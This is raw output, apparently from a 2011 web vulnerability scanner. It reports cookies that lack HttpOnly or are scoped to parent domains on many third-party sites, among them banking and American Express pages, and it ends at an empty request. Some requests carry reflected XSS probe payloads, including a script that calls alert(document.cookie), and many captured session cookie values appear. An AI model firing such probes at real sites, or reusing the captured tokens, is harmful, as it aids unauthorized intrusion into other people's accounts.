GMT Last-Modified: Sun, 06 Feb 2011 22:36:47 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www418 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blank.gif HTTP/1.1 Host: yasnide.ivwbox.de Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: srp=17834d4ee7b34e7c0006; i00=17834d4ee7b34e7c0006
Response
HTTP/1.1 200 OK Server: s2.30.1 Date: Sun, 06 Feb 2011 18:25:55 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref=http://p3p.infonline.de/p3p.xml, CP=NOI DSP NID PSAa OUR NOR UNI COM NAV Set-Cookie: srp=17834d4ee7b34e7c0006; path=/ Set-Cookie: i00=17834d4ee7b34e7c0006; path=/; domain=.ivwbox.de; expires=Monday, 06-Feb-2012 18:25:55 GMT Content-Length: 43 Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/ivw/CP/hp-ano;?r=http%3A//burp/show/101&d=25333.629501983523 HTTP/1.1 Host: yasnide.ivwbox.de Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 FOUND Server: s2.30.1 Date: Sun, 06 Feb 2011 18:25:55 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Expires: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref=http://p3p.infonline.de/p3p.xml, CP=NOI DSP NID PSAa OUR NOR UNI COM NAV Set-Cookie: srp=17834d4ee7b34e8c0006; path=/ Set-Cookie: i00=17834d4ee7b34e8c0006; path=/; domain=.ivwbox.de; expires=Monday, 06-Feb-2012 18:25:55 GMT Location: /blank.gif Content-Length: 1 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ypn-js.overture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:52 GMT Set-Cookie: BX=as8qm3d6krjfo&b=3&s=48; expires=Tue, 05-Feb-2013 20:00:00 GMT; path=/; domain=.overture.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Wed, 27 Aug 2008 22:13:17 GMT Accept-Ranges: bytes Content-Length: 3298 Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo!</title><meta name="ROBOTS" content="NOINDEX" /><style> /* nn4 hide */ /*/*/ body { ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}@x90 HTTP/1.1 Host: zap.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:23:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Pragma: no-cache Cache-control: no-cache Set-Cookie: OAX=rcHW801NzfgADyjj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com Set-Cookie: NXCLICK2=011PlqXoNX_vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}!y!90!1zvpE!1qKxJ; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com Location: http://t.mookie1.com/t/v1/imp?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58835998;235229178;40346350&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://ad.doubleclick.net/ad/N3867.8763.VIBRANTMEDIAINC/B5178582;sz=1x1;ord=2112748198? Content-Length: 533 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d15efm_qppm_iuuq=ffffffff09499e5745525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/imp?migAgencyId=43&am ...[SNIP]...
XARAYASID=m37gsp1a4komn8m06toh36i5v4; expires=Wed, 06 Feb 2036 04:23:55 GMT; path=/; domain=.splunk.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: zh-hans.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
XARAYASID=s9ut7nium0d0lodm593iqgkh82; expires=Wed, 06 Feb 2036 04:23:57 GMT; path=/; domain=.splunk.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: zh-hant.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502D850131A3-40000101003A95D2|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:31 GMT; Domain=.2o7.net; Path=/
s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:31 GMT; Domain=.2o7.net; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:39 GMT; Domain=.2o7.net; Path=/
s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:39 GMT; Domain=.2o7.net; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:22:21 GMT; Domain=.2o7.net; Path=/
s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:22:21 GMT; Domain=.2o7.net; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=abcVlqF-RDKD_8Ubzi33s; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /log.jsp?siteid=12&rand=36384 HTTP/1.1 Host: 66.29.38.208 Proxy-Connection: keep-alive Referer: http://www.freedownloadscenter.com/terms/html-tracert-nslookup/nslookup.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cr/ HTTP/1.1 Host: about.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 37517 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Expires: Sat, 05 Feb 2011 21:50:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 21:50:51 GMT Connection: close Set-Cookie: ASPSESSIONIDASDBDTQR=LDHHNHDCIPFCPCJINCAFLEBD; path=/ Set-Cookie: BIGipServerAXAboutUs_Public=3725306048.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/impression.js HTTP/1.1 Host: ads.adxpose.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7E69101147A34B6B00D14757D8B00E8B; Path=/ ETag: "0" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Content-Length: 9 Date: Sat, 05 Feb 2011 22:42:44 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/join HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 21:50:29 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=be7a4e884222cc6fa4ab1f17533bad8a; expires=Tue, 01-Mar-2011 01:23:49 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 21:50:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: baselinemag.us.intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--";
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E7B165A3FC1D5B0A74756CBDC197A8CE; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 176 Date: Sun, 06 Feb 2011 16:00:34 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blog.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 36022 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=CEDGFMCCFKAPMLCDHAIIHEPD; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:45:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Vibrant - The Leaders of Contex ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rmb-account/login-page HTTP/1.1 Host: channelmarketing.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:46:51 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14989
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META http-equiv="C ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
sessionId=nullCookie; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1 Host: cibng.ibanking-services.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:24:55 GMT Server: IBM_HTTP_Server Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-Cache Set-Cookie: wf=wf Set-Cookie: sessionId=nullCookie; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 9003
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>Personal Savings from American Express : Welcome to Personal Savings from American ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gcs/cards/ HTTP/1.1 Host: corp.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:50:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243-25629229680629; path=/; expires=Sat, 05-Feb-16 21:50:31 GMT; domain=.americanexpress.com X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=mzrsjm55ziqng1au1tmzi545; path=/ Cache-Control: public, max-age=90 Expires: Sat, 05 Feb 2011 21:52:01 GMT Last-Modified: Sat, 05 Feb 2011 21:50:31 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 39860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gcs/cards/land/compare.aspx HTTP/1.1 Host: corp.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:50:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243--17320946710097; path=/; expires=Sat, 05-Feb-16 21:50:33 GMT; domain=.americanexpress.com X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=q0nfjsmlal0n1l45z4jzte55; path=/ Cache-Control: public, max-age=900 Expires: Sat, 05 Feb 2011 22:05:33 GMT Last-Modified: Sat, 05 Feb 2011 21:50:33 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 40724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: dailyme.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:47:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Set-Cookie: DMSession=mta7v9iqenkhb3clgekkekl847; expires=Wed, 06-Feb-2036 04:47:24 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CakeCookie[DMWelcome]=1296946044; expires=Mon, 07-Mar-2011 22:47:24 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43921
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http: ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: download32.us.intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY";
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=ED259F275B4DF68A893132CB65AC345C; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 176 Date: Sat, 05 Feb 2011 21:51:04 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=a6o1kn0utu76227b6d1n8dnmd0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=gjvvrs2l67ha5pldm6dmbvpve3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: etfdb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:04:04 GMT Server: Apache X-Powered-By: W3 Total Cache/0.9.1.3 Set-Cookie: PHPSESSID=gjvvrs2l67ha5pldm6dmbvpve3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 X-Pingback: http://etfdb.com/xmlrpc.php Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.flow?eventcode=000_000_11&location=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&uid=W25t6coj820hSGmI&xy=251%2C232&wh=985%2C1012&duration=21132982%7C21132982&iframed=0 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2; JSESSIONID=43E251877DDE1938FDE4FA32451B41F5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6E5592FB2762E8F73BC4BF6D783C51C0; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 0 Date: Sat, 05 Feb 2011 21:51:28 GMT Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: funp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /106253 HTTP/1.1 Host: getclicky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:51:05 GMT Server: Apache P3P: CP='NOI DSP COR CUR OUR NID NOR' Set-Cookie: PHPSESSID=599ee4e27da0b537e792a372d516bdda; path=/ Cache-Control: must-revalidate, no-cache Set-Cookie: referer=80899; expires=Wed, 06 Apr 2011 21:51:05 GMT; path=/; domain=.getclicky.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45095
<!doctype html> <html> <head> <title>Web Analytics in Real Time | Clicky</title> <meta name="description" content="Clicky Web Analytics is simply the best way to monitor, analyze, and react to your bl ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=0e18f424g79t43jjqhrcjrriq4; expires=Fri, 02 Dec 2011 22:49:24 GMT; path=/; domain=.hellotxt.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: hellotxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
